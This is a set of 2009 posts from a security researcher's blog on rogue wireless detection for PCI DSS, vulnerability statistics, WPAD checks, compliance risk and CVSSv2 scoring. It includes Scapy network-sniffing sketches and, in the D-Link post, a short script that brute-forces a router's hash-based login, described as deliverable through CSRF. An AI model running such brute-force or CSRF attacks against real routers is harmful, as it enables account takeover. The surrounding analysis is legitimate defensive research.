Tuesday, October 20, 2009

PCI DSS and wireless networks

Once again we are discussing PCI DSS and wireless networks: http://www.securityfocus.com/archive/137/507096

But how can we determine whether a rogue AP, and especially rogue wireless clients (a WLAN card plugged into a back-office server), are inside the CDE? By signal level? Unfortunately, Kismet shows this information only for APs, not for clients :(

I’ve already answered this question on the Informzaschita web site, but let’s repeat it here.


>How can I tell whether a wireless access point with encryption enabled is part of our local network?

An access point’s location can be detected in several ways. The easiest is by the traffic “in the air”. Even if the AP uses strong encryption (not WEP), enough data to identify the segment is sent in clear text, for example, the sender’s MAC address. Since an access point is a link-layer device, it relays all broadcast requests of its segment “into the air”. Because there are plenty of such requests on any network (ARP, NetBIOS, IPv6, etc.), comparing the MAC addresses of senders whose packets pass through the AP with the list of known MAC addresses of your network makes it easy to locate the access point. Additionally, you can generate a large number of broadcast packets with utilities that implement ARP ping, such as Cain or nmap.
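To make this concrete, here is a minimal sketch (Python with Scapy; the subnet and interface names are hypothetical placeholders) of an ARP ping sweep that both provokes broadcast traffic and collects the “known” wired MAC addresses. nmap (e.g. `nmap -sn -PR 192.168.1.0/24`) or Cain achieve the same effect.

```python
# A minimal sketch: ARP-ping the wired segment to provoke broadcast traffic
# and build a list of "known" MAC addresses. The subnet and interface are
# hypothetical examples; adjust for your network. Requires Scapy and root.
from scapy.all import ARP, Ether, srp

def arp_ping(subnet="192.168.1.0/24", iface="eth0", timeout=2):
    """Send ARP who-has requests to every address in the subnet and
    return a dict {IP: MAC} of the hosts that replied."""
    # Ether(dst="ff:ff:ff:ff:ff:ff") makes the request a link-layer broadcast,
    # so the access point will relay it into the air as well.
    answered, _ = srp(
        Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=subnet),
        iface=iface, timeout=timeout, verbose=False,
    )
    return {reply.psrc: reply.hwsrc for _, reply in answered}

if __name__ == "__main__":
    wired_macs = arp_ping()
    for ip, mac in sorted(wired_macs.items()):
        print(f"{ip:15} {mac}")
```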
As for triangulation… running after every beacon with an antenna is not an easy task.

>Where can I find information about locating access points by triangulation, and what kind of antenna is best?

Parabolic and Yagi antennas for the 2.4 GHz band are rather bulky, so panel antennas are more convenient to use, despite their worse directivity and higher sensitivity to reflected signals.

>But what if it is a really properly configured access point: WPA2 + hidden SSID + MAC filter? It takes a long time to find it while there is no activity.

Any AP connected to the network still “signals” anyway:
- it sends beacons (even if the ESSID is empty)
- it relays broadcasts and multicasts with source MAC addresses in clear text

It’s difficult to imagine a network without broadcast requests, and I described above how to locate an access point using them.
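On the passive side, a rough sketch (again Scapy, with a hypothetical monitor-mode interface) could collect the source MAC addresses seen in 802.11 data frames and intersect them with the wired list gathered above:

```python
# Sketch: sniff 802.11 data frames in monitor mode and intersect the MAC
# addresses seen "in the air" with the wired MAC list collected earlier
# (e.g. by ARP ping). The interface name is a hypothetical placeholder.
from scapy.all import sniff, Dot11

def collect_air_macs(iface="wlan0mon", count=2000):
    """Return the set of MAC addresses seen as senders in 802.11 data frames."""
    macs = set()

    def handler(pkt):
        if pkt.haslayer(Dot11):
            d = pkt[Dot11]
            if d.type == 2:  # type 2 = data frames
                # addr2 is the transmitter; addr3 carries the original (wired)
                # source address in frames relayed from the distribution system.
                for mac in (d.addr2, d.addr3):
                    if mac:
                        macs.add(mac.lower())

    sniff(iface=iface, prn=handler, count=count, store=False)
    return macs

if __name__ == "__main__":
    wired_macs = {"00:11:22:33:44:55"}  # placeholder: your known wired MAC list
    air_macs = collect_air_macs()
    suspects = air_macs & {m.lower() for m in wired_macs}
    print("MACs from our wired network seen in the air:", suspects or "none")
```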

>How can we detect clients that connect to external access points?

Clients that are allowed to connect to “external” access points can be detected by active security assessment mechanisms. For example, MaxPatrol has three mechanisms that help to solve the problem:
- inventory, which analyzes the wireless settings of Windows clients;
- security assessment, which detects insecure configurations (e.g., multihomed hosts, no encryption, WEP usage);
- compliance management, which maintains black and white lists of access points allowed in the network.

Another way is by monitoring the wireless network, but you need to build a list of “your” MAC addresses beforehand. This can be done by active (see above) or passive (see below) mechanisms.

>How can I tell that these are my users?

Something about this is written here (Russian).

In any case, a workstation (especially one running Windows) sends a lot of interesting traffic that lets you determine its network membership: NetBIOS broadcasts, WPAD requests, and DHCP requests that carry the host and domain name...
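For illustration, here is a small sketch (Scapy again; the interface name is a placeholder) that passively watches DHCP traffic and prints the host name and domain options:

```python
# Sketch: passively watch DHCP requests and print the host name / domain
# options, which often reveal a station's network membership. Works on a
# wired tap or a decrypted wireless capture; interface name is hypothetical.
from scapy.all import sniff, DHCP, BOOTP

def dhcp_options(pkt):
    """Extract interesting DHCP options as a dict."""
    wanted = {"hostname", "domain", "vendor_class_id", "requested_addr"}
    opts = {}
    for opt in pkt[DHCP].options:
        if isinstance(opt, tuple) and opt[0] in wanted:
            value = opt[1]
            opts[opt[0]] = value.decode(errors="replace") if isinstance(value, bytes) else value
    return opts

def handler(pkt):
    if pkt.haslayer(DHCP):
        # chaddr holds the client hardware (MAC) address, padded to 16 bytes
        print(pkt[BOOTP].chaddr[:6].hex(":"), dhcp_options(pkt))

if __name__ == "__main__":
    sniff(iface="eth0", filter="udp and (port 67 or 68)", prn=handler, store=False)
```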

But one question is still open: how do we get clients to send this kind of traffic to us? Here Gnivirdraw can help.

>Active scanners don’t help us!!!

Of course, sometimes running around with a laptop is useful :). But scanners can help with the following:


- fingerprinting of network devices (including APs) in pentest mode;

- inventory of wireless client configurations (MAC addresses, lists of known networks);

- analysis of access point configurations;

- analysis of wireless device logs in order to find “bad” events.

So, some wireless problems can be solved on the wire :)

Monday, October 19, 2009

WASC Announcement: 2008 Web Application Security Statistics Published

The Web Application Security Consortium (WASC) is pleased to announce the WASC Web Application Security Statistics Project 2008. This initiative is a collaborative, industry-wide effort to pool sanitized website vulnerability data and to gain a better understanding of the web application vulnerability landscape. We ascertain which classes of attacks are the most prevalent, regardless of the methodology used to identify them. Industry statistics such as those compiled by the MITRE CVE project provide valuable insight into the types of vulnerabilities discovered in open source and commercial applications; this project tries to be the equivalent for custom web applications.

This article contains web application vulnerability statistics collected during penetration tests, security audits, and other activities performed by companies that were members of WASC in 2008. The statistics cover 12,186 sites with 97,554 detected vulnerabilities.

WASC Web Application Security Statistics 2008

Download.

Thursday, October 15, 2009

A little plug about Bitrix


We recently audited the new security functions of "1C-Bitrix: Site Management" to assess their compliance with the Web Application Firewall Evaluation Criteria of the Web Application Security Consortium.

The story continued at the Chaos Constructions CC9 festival that took place on August 29-30, 2009 in Saint Petersburg, Russia.

"More than six hundred Russian hackers have been trying to hack down a server-installed content management software in attempt to get over its sophisticated Proactive Protection system. There had been more than 25.000 attacks recorded and effectively repulsed during the software crash test competition hours. The competition was organized by the Bitrix, Inc. team and Positive Technologies IT experts"


Bitrix Real-Time Hack Competition in Russia

25.000 Russian Hack Attacks Repulsed by Bitrix in Two Days

A WAF-protected, PCI-compliant site, tested "by Russian hackers", out of the box. Not bad, isn’t it?

Wednesday, June 3, 2009

Adding protection means adding “a hole”

Funny news

New D-Link protection for Wi-Fi routers is a hole in security!

D-Link had barely announced updated firmware for its wireless routers with protection against automated registrations (CAPTCHA) when several enthusiasts found out that these new protection measures make the routers more vulnerable to password theft.


http://www.securitylab.ru/news/379779.php


Details:

http://www.sourcesec.com/2009/05/12/d-link-captcha-partially-broken/


There are some comments on the SecurityLab forum that ask:

Is it again an attack with default password?

The situation is actually much more amusing. The problem is that D-Link uses CAPTCHA to protect against Cross-Site Request Forgery (CSRF), which (or, to be more precise, the method of exploiting it against a router) Symantec grandly named Drive-by Pharming. But an implementation error (requests with a valid hash are accepted without the CAPTCHA) turns this protection into a vulnerability.

If the password is the default one, there is a method to bypass Basic authentication via JavaScript (see "Breaking through the perimeter", http://www.securitylab.ru/analytics/292473.php).

But if the password (or a derivative of it, such as a hash) is sent in a GET request (as a duplicate of Basic authentication), the situation is more interesting: an attacker can use not only the default password hash but also brute-force the user’s password with JavaScript via CSRF, the very attack the CAPTCHA was supposed to prevent.

This means the vulnerability affects not only default passwords: it can also increase the effectiveness of brute-force attacks on user passwords via CSRF, and the usual password protections (timeouts, temporary lockouts, etc.) do not kick in, because it is not the login form that is brute-forced but connection attempts with different “normal” hashes, which are used instead of a session identifier. A simple script is enough: it calls the address

GET /post_login.xml?hash=

and checks whether the action was successful. The only remaining task is to trick the user into opening the attacker’s site :)
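Purely as an illustration, such a script could look roughly like the sketch below. The router address and the wordlist are placeholders, and the way the hash is derived from the password is device-specific, so a plain MD5 is used here only as an assumption; in the real attack the same requests would be issued by JavaScript in the victim’s browser via CSRF.

```python
# Sketch only: brute-forcing the hash-based login of the vulnerable firmware.
# The router address, wordlist and hash derivation are all hypothetical
# placeholders; the real hash construction is device/firmware specific.
import hashlib
import urllib.request

ROUTER = "http://192.168.0.1"  # hypothetical router address

def try_hash(candidate_hash: str) -> bool:
    """Call post_login.xml with a candidate hash and report success."""
    url = f"{ROUTER}/post_login.xml?hash={candidate_hash}"
    with urllib.request.urlopen(url, timeout=5) as resp:
        body = resp.read().decode(errors="replace")
    # Success detection is also device specific; looking for a marker in the
    # XML reply is just an illustrative assumption.
    return "OK" in body

if __name__ == "__main__":
    for password in ["admin", "password", "12345678"]:   # toy wordlist
        h = hashlib.md5(password.encode()).hexdigest()    # placeholder derivation
        if try_hash(h):
            print("valid hash found for password:", password)
            break
```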

All in all, a rather interesting design error in the web application’s authentication mechanism.

Monday, May 18, 2009

Tool for WINS and DNS (MS09-008)

The utility detects potentially dangerous entries (such as WPAD) in DNS and WINS databases. It can also scan the local network to find hosts with dangerous NetBIOS names. If system and security administrators run the utility regularly, it lets them keep track of potentially dangerous entries in name servers and the appearance of hosts with dangerous NetBIOS names on the local network.
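For illustration only, here is a simplified sketch of one such check: does a “wpad” entry exist in the local DNS zone? The domain name is a hypothetical example; the real utility also covers WINS and NetBIOS scanning.

```python
# Simplified sketch of one check the utility performs: is there a "wpad"
# entry in the local DNS zone? The domain name is a hypothetical example;
# the real tool also inspects WINS and scans for dangerous NetBIOS names.
import socket

def check_wpad(domain="corp.example.com"):
    """Try to resolve wpad.<domain> and report whether the entry exists."""
    fqdn = f"wpad.{domain}"
    try:
        addr = socket.gethostbyname(fqdn)
        print(f"WARNING: {fqdn} resolves to {addr} - verify this entry is legitimate")
    except socket.gaierror:
        print(f"OK: {fqdn} does not resolve; consider registering it defensively")

if __name__ == "__main__":
    check_wpad()
```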



Detailed information can be found in the article by Sergey Rublev and on SecurityLab:

http://www.securitylab.ru/news/extra/380522.php

http://www.securitylab.ru/_download/articles/wpad_weakness_en.pdf

Download here:
http://www.ptsecurity.ru/download/wpadcheck_en.zip

Wednesday, May 13, 2009

Compliance management vs Risk management

If we consider the question of compliance with requirements in terms of risk analysis, i.e. assume that:

threat – the consequences of a violation, as described by the compliance enforcement agency (CEA :);
vulnerability – non-compliance with the requirements;
attack – checks performed by the CEA;
counter-measure – compliance with the requirements;

then we have a practically unprecedented situation: all the basic data needed for quantitative risk analysis using the classical formula ARO x SLE = ALE.

http://www.windowsecurity.com/articles/Risk_Assessment_and_Threat_Identification.html

We have:

ARO – the probability (annual rate) of CEA checks;
SLE – the consequences of a violation, as defined by the law or the CEA.

This interesting situation not only shows that textbook formulas still work sometimes, but also demonstrates the great benefit of compliance as a driver of information security.

Let’s consider some examples that are now widely known: Russian Federal Law 152 (On Personal Data) and PCI DSS.

PCI DSS

This case is quite simple: because of current events in the world economy, Visa and the other payment systems decided not to torment businesses and allowed them to postpone their action plans. In effect, the “attack” is delayed for several years. It is an unprecedented situation when you know for certain that this particular attack will not take place for a year, or even a couple of years. Just imagine an indulgence against virus attacks or hardware theft for a whole year… A great thing!

So:

threat – fines (N x K$) or prohibition of operations (let it also be N x K$ for simplicity); this is the SLE;
vulnerability – non-compliance with the requirements (PCI DSS);
attack – the response of the CEA (Visa, MasterCard, etc.) to a deviation from the action plan (the probability that it will occur, the ARO, is 0 times a year)

In total, we have:

Risk = (N x K$) x (0) = 0

That is, you can do nothing!!!

But! The key condition is that you have an action plan. Accordingly, you should create one, by yourself or with a QSA, as you wish. Unfortunately, I have no information about the regulator’s response when there is no PCI DSS action plan at all, but I think in that case the SLE is roughly the cost of the counter-measure (the audit).

Federal Law 152

In this case everything is also simple.

threat – several variants:

1. Administrative liability – fines.
2. Suspension or termination of personal data processing in the company – the cost of idle time/degradation of the affected business processes until the violations are eliminated; I think you can assume at least 1/6 of a year.
3. The company and/or its head is held criminally (civilly, disciplinarily, etc.) liable – a catastrophe.
4. Suspension or revocation of the licenses for the company’s core activity – close to a catastrophe in the current situation.

attack – check by CEA

Given the novelty of the law, the regulator’s interest, and the possibility of a check being initiated from outside (by a complaint), the probability that the attack will be carried out in 2010 can be taken as 1.
For more detailed calculations by region and business branch, the following statistics can be used:

http://community.livejournal.com/personal_data/721.html

In total, we have (worst-case scenario):

Risk = (the value of business) x (1) = (the value of business)

That is: there is a problem, and you have to solve it.
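Just to spell out the arithmetic, here is a toy sketch of both calculations with ALE = ARO x SLE; all the monetary figures are placeholders, of course.

```python
# Toy illustration of ALE = ARO x SLE for the two examples above.
# All monetary values are placeholders, not real fines or business values.

def ale(aro: float, sle: float) -> float:
    """Annualized Loss Expectancy = Annual Rate of Occurrence x Single Loss Expectancy."""
    return aro * sle

# PCI DSS: the action plan postpones the "attack", so ARO = 0 for now.
pci_fine = 100_000           # N x K$, placeholder
print("PCI DSS risk:", ale(aro=0, sle=pci_fine))        # -> 0.0

# FL-152: a check in 2010 is almost certain, so take ARO = 1;
# worst case, the SLE is the value of the business itself.
business_value = 5_000_000   # placeholder
print("FL-152 risk:", ale(aro=1, sle=business_value))   # -> 5000000.0
```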

PS. There is no need to draw far-reaching conclusions. It’s just a funny story. We didn’t sell FL-152 consulting :)

Monday, April 20, 2009

Microsoft has published its regular Security Intelligence Report.

Russia is among the leaders in the percentage of infected computers:
The infection rate is about 21.1 per 1,000 runs of the “cleaner” (MSRT), while the world average is 8.6. A very strange figure.



It is possible that this figure is strongly related to how easily different platforms can be infected:



I think nobody is surprised that many home users on XP SP0 or SP1 are afraid to update because they fear that their cracked copies of Windows will stop working. But will they have the Malicious Software Removal Tool? Will the local “computer guy” bring it on a floppy disk? More likely something from Kaspersky or DrWeb.

This is a very strange situation. Can these really be corporate employees?

PS. Actually, this is a wonderful report.
The most common threat in Russia is Taterf, which spreads through shared folders; in the USA it is Win32/Renos and Win32/Zlob. There is a lot of data about Conficker in the report, but it is missing from the top lines of the statistics.

Is it a wonder?

Sunday, April 12, 2009

Security in our life

I took a flight from Domodedovo airport (Moscow) recently and thought a lot…
And my thoughts were grim… I hope it is only in Britain and only on submarines.



PS. In case somebody does not recognize it – this is Symantec reporting Kido/Conficker/Downadup.

Thursday, March 19, 2009

Webspider: express vulnerability assessment

A concept preview of the Webspider express security scanner (pure AJAX :) has recently been published. It is a tool that analyzes, in a matter of seconds, the software most frequently targeted by attackers. The system is intended for quick protection checks of Internet and intranet users, users of e-commerce systems, and ISP customers.

You can test it here:

http://www.securitylab.ru/addons/webspider3/fast_check.php



The current version can detect vulnerabilities in popular ActiveX components and plug-ins, the Mozilla Firefox and Opera browsers, and Java and Adobe Flash, and also checks for the MS07-042, MS08-069 and MS09-002 updates.
We plan to publish a detailed article about the techniques used in April.

It’s just a preview, so please be indulgent.

Tuesday, March 10, 2009

Positive Technologies Research Lab

This year we decided to resume publishing details of vulnerabilities detected during research and penetration testing.

http://en.securitylab.ru/lab/

In 2006, for a number of reasons, we decided to shift the burden of publishing vulnerability details to the software vendors and stopped publishing details of the problems we had found. However, many customers ask us to help eliminate vulnerabilities in third-party software, which prompted us to resume the process.
The most interesting current issue (in my opinion) is a set of vulnerabilities in VMware that allow attackers to get from the guest OS to the host OS. And straight into the kernel.

I personally have tried different approaches to getting vulnerabilities in third-party software fixed, from full-disclosure extremism to selling vulnerabilities on the “white” market, for example to iDefense (http://labs.idefense.com/vcp/). Some thoughts are available here:
http://www.securitylab.ru/analytics/241826.php (Russian)

Tuesday, February 24, 2009

We’ve published a network utility that checks whether the MS08-065, MS08-067 and MS09-001 security updates are installed on a system. The utility does not need administrative privileges and works in pentest mode.
Feedback on the previous releases was quite positive, so we decided to upgrade it.




Additional info:
http://www.securitylab.ru/news/extra/368760.php

Downloads:
http://www.ptsecurity.com/download/pt-check-09-001.zip

Monday, January 26, 2009

Risks, risks, risks

I recently came across vulnerabilities in the management web interface of a UTM device during a security assessment. A rather typical combination of CSRF and XSS is interesting because it lets attackers reach the device command line and manage the system interactively from the administrator’s browser. But that is not the whole point; the vulnerability itself is typical.
The most interesting part (as always) was the communication with the vendor. We disagreed about the vulnerability risk level, which led to a desperate exchange of letters. Here I would like to share our thoughts on the subject.
As a rule, the risk level is set by the software vendor or by a company that produces security tools (vulnerability scanners, intrusion detection systems, etc.). In this case a typical scheme similar to traffic lights is used: low risk (green), medium risk (yellow), high risk (red). Sometimes an additional fourth level is used for critical vulnerabilities.
Many vendors use this approach; for example, Microsoft uses four severity levels in its security bulletins.
But the ‘traffic lights’ model is not transparent and depends heavily on the expert’s world view, state of mind, and other factors. That’s why we use the CVSSv2 methodology.

English

http://www.first.org/cvss/cvss-guide.html

Russian
http://www.securitylab.ru/analytics/355336.php
http://www.securitylab.ru/analytics/356476.php

The rather simple metrics on which CVSSv2 is based make it possible to assess risk more or less consistently. In addition, the metrics cover several extra factors, such as exploitability and the environment, which is very important.
Quotation (Russian):
Leaving aside the advantages and disadvantages of the methods, the following factors can affect assessment reliability:
  1. Context dependence;
  2. System configuration dependence;
  3. Assessment method dependence.
Vulnerabilities of the same type can have different risk levels in different applications. For example, a CSRF vulnerability may pose no threat to a typical presentation server or search engine, but it is critical for the web interface of an e-mail or payment system. Through an information leak, an attacker might access application logs (low or medium risk) or download a backup copy of the site (high risk).
System configuration can also affect the risk level. An “SQL Injection” vulnerability is usually classified as high risk, but if the web application has restricted rights on the database server, it becomes a medium or low risk vulnerability. In another installation the same flaw could be used to access the operating system with superuser rights, which makes it critical.
The assessment method also greatly affects the assigned risk level. In the example above, a network scanner would merely flag “SQL Injection” as a problem. To determine the privileges available to a potential attacker, one has to actually exploit the vulnerability or obtain detailed information about the interaction between the web application and the database server using a white-box approach.
So it is absolutely incorrect to assign equal risk levels to different vulnerabilities of the same type (for example, SQL Injection) without detailed analysis.
Here is an example.

Let’s assume that the SQL Injection gives access to the DBMS with minimal web server privileges, for example db_reader, and the web application does not store confidential data (such as passwords) in the DBMS. This yields one CVSSv2 vector and risk level.
In the other case, if user passwords (including the administrator’s password) are stored in the DBMS, the risk level is higher, because the system is more exposed in terms of data confidentiality:

(AV:N/AC:L/Au:N/C:C/I:N/A:P/E:H/RL:W/RC:C)= 8.1

If the web application has unreasonably broad privileges on the database server, for example sa, the same vulnerability is much more dangerous:

(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:W/RC:C) = 9.5
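For the curious, here is a small sketch that reproduces these numbers using the formulas and metric weights from the CVSSv2 guide linked above; the figures quoted in this note are temporal scores, i.e. the base score adjusted by the E, RL and RC metrics.

```python
# Sketch: compute CVSSv2 base and temporal scores for the vectors above,
# using the weights and formulas from the CVSS v2 guide.
AV = {"L": 0.395, "A": 0.646, "N": 1.0}
AC = {"H": 0.35, "M": 0.61, "L": 0.71}
AU = {"M": 0.45, "S": 0.56, "N": 0.704}
CIA = {"N": 0.0, "P": 0.275, "C": 0.660}
E = {"U": 0.85, "POC": 0.9, "F": 0.95, "H": 1.0, "ND": 1.0}
RL = {"OF": 0.87, "TF": 0.90, "W": 0.95, "U": 1.0, "ND": 1.0}
RC = {"UC": 0.90, "UR": 0.95, "C": 1.0, "ND": 1.0}

def cvss2_temporal(vector: str) -> float:
    """Parse a CVSSv2 vector string and return the temporal score."""
    m = dict(part.split(":") for part in vector.strip("()").split("/"))
    impact = 10.41 * (1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]]))
    exploitability = 20 * AV[m["AV"]] * AC[m["AC"]] * AU[m["Au"]]
    f = 0.0 if impact == 0 else 1.176
    base = round((0.6 * impact + 0.4 * exploitability - 1.5) * f, 1)
    return round(base * E.get(m.get("E", "ND"), 1.0)
                      * RL.get(m.get("RL", "ND"), 1.0)
                      * RC.get(m.get("RC", "ND"), 1.0), 1)

print(cvss2_temporal("AV:N/AC:L/Au:N/C:C/I:N/A:P/E:H/RL:W/RC:C"))  # 8.1
print(cvss2_temporal("AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:W/RC:C"))  # 9.5
print(cvss2_temporal("AV:N/AC:H/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:C"))  # 6.9
```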

If we reduce this to the “traffic lights” model or to the five PCI DSS levels (Urgent, Critical, High, Medium, Low), the result is:

1. Medium (2) and High (3)
2. Medium (2) and Critical (4)
3. High (3) and Urgent (>4).

This means that the risk level of a vulnerability can vary greatly depending on the system and its settings.

The CVSSv2 vector for the XSS issue (see the description at the beginning of this note) is:

(AV:N/AC:H/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:C) = 6.9

So in PCI DSS terms (the most popular model at the moment) the risk level of the issue is High or even Critical, but certainly not Low. And in any case, the audit is failed :))

PS. I can understand the vendor’s reasoning: if security was not taken into account when the software was designed, then (quoting them) "hardening the management interface would probably imply a complete redesign of it".

There you have it – how variable risk assessment can be.